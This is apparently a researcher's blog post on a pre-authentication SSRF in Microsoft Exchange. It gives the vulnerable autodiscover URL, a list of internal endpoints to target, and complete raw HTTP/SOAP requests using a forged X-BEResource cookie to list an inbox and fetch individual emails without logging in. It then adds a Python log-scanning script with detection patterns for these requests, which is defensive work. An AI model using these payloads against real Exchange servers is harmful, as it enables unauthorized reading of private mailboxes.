Pre-Auth SSRF To Full MailBox Access (Microsoft Exchange Server Exploit)

Exploitation:

On reading the blogs I figured that the pre-auth SSRF can be triggered by the vulnerable URL below (the application forwards the request to the internal “/mapi/nspi” endpoint):

https://autodiscover.redacted.com/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com

Other internal paths the SSRF can be pointed at:

/powershell
/mapi/emsmdb
/autodiscover/autodiscover.xml
/ews/exchange.asmx
/owa/auth/Current/
/ecp/default.flt
/ecp/favicon.ico

Payload used to list the inbox without authentication (FindItem):

POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1128
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:FindItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ParentFolderIds>
<t:DistinguishedFolderId Id='inbox'>
<t:Mailbox>
<t:EmailAddress>info@redacted.com</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:ParentFolderIds>
</m:FindItem>
</soap:Body>
</soap:Envelope>

Payload used to retrieve individual emails without authentication (GetItem, using an ItemId and ChangeKey returned by the FindItem response):

POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1062
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:GetItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:ItemId Id="ItemID" ChangeKey="Changekey" />
</m:ItemIds>
</m:GetItem>
</soap:Body>
</soap:Envelope>
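The two request shapes above leave distinctive traces on the Exchange front end: a request to autodiscover.json whose query string smuggles "@host/backend-path", and a POST to a static file under /ecp/ carrying a client-supplied X-BEResource cookie that names a backend endpoint. The following detection script is an added example and not part of the original post; it parses constructed IIS W3C-style log lines (an assumption: cs(Cookie) logging is enabled on the front-end site, and the field order follows the #Fields header) and flags entries matching either pattern.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not real logs) in a simplified IIS W3C-style layout.
# Assumption: cs(Cookie) logging is enabled on the front-end site; the field
# order is taken from the #Fields header, as IIS does.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs(Cookie) sc-status
2021-03-02 10:15:01 203.0.113.7 GET /autodiscover/autodiscover.json @test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com - 200
2021-03-02 10:15:02 203.0.113.7 POST /ecp/favicon.ico - X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1 200
2021-03-02 10:15:03 198.51.100.4 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.redacted.com%2fowa - 200
2021-03-02 10:15:04 198.51.100.4 POST /ecp/default.flt - X-BEResource=[:[@redacted.com:444/mapi/emsmdb#~1 200
2021-03-02 10:15:05 192.0.2.9 GET /ecp/favicon.ico - ASP.NET_SessionId=abc123 200
"""

# Rule 1: autodiscover.json request whose query smuggles "@<host>/<backend path>".
AUTODISCOVER_SSRF = re.compile(r"@[^/\s]+/[A-Za-z]")
# Rule 2: a client-supplied X-BEResource cookie naming a backend path and
# ending in the "#~<n>" routing suffix seen in the payloads above.
BERESOURCE_COOKIE = re.compile(r"X-BEResource=[^;]*/[^;]*#~\d+", re.IGNORECASE)


def parse_iis(text):
    """Parse W3C-style lines into dicts keyed by the names in the #Fields header."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than misalign the fields
        entries.append(dict(zip(fields, parts)))
    return entries


def classify(entry):
    """Return the name of the first detection rule an entry trips, or None."""
    stem = entry.get("cs-uri-stem", "").lower()
    query = unquote(entry.get("cs-uri-query", ""))  # decode %3F etc. before matching
    cookie = entry.get("cs(Cookie)", "")
    if stem.endswith("/autodiscover/autodiscover.json") and AUTODISCOVER_SSRF.search(query):
        return "autodiscover-json-ssrf"
    if BERESOURCE_COOKIE.search(cookie):
        return "x-beresource-backend-cookie"
    return None


def scan(text):
    """Return (client ip, method, uri stem, rule) for every entry that trips a rule."""
    hits = []
    for entry in parse_iis(text):
        rule = classify(entry)
        if rule:
            hits.append((entry["c-ip"], entry["cs-method"], entry["cs-uri-stem"], rule))
    return hits


if __name__ == "__main__":
    for ip, method, stem, rule in scan(SAMPLE_LOG):
        print(f"{rule:28} {ip:15} {method} {stem}")
```

Run against the constructed sample, the script flags the autodiscover.json request and both X-BEResource POSTs and leaves the ordinary OWA logon and the plain favicon request alone. On a real front end, point it at the IIS logs of the Default Web Site, and treat any hit as a reason to pull the matching HttpProxy and EWS logs for the same time window.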

Vanshal Gaur

18 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG